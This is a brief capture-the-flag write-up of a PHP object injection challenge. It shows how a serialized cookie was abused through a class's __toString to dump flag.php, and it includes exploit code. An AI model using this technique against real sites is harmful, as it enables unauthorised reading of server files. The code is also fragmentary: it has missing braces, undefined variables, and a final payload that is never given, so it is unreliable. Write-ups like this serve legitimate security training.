- Try to find the flag
- access the url, we can find that there is a input form, try to input something.
- notice cookie has been changed, a key 'list' is added.
decode as url
a:1:{i:0;s:16:"Hacked by smi1e!";}
which means that the php code running on the server may like this
$input = $_POST['a'];
$inputs = unserialize($_COOKIE['list']);
array_push($inputs, $input);
echo join('', $array);
- PHP object injection!
- then we check the html source code generated by index.php found something interesting at the bottom
#try to read flag.php
Class whatthefuck{
public function __toString()
return highlight_file($this->source,true);
- all we need to do is try to call the
function ofclass whatthefuck
to read theflag.php
- here are the final exploit.
➜ guess-the-code ls
exploit.php flag.php
➜ guess-the-code cat exploit.php
#try to read flag.php
Class whatthefuck{
public function __toString()
return highlight_file($this->source,true);
$x = new whatthefuck();
$y = serialize(array($x));
$z = unserialize($y);
echo $z;
put the following string as $_COOKIE['list'];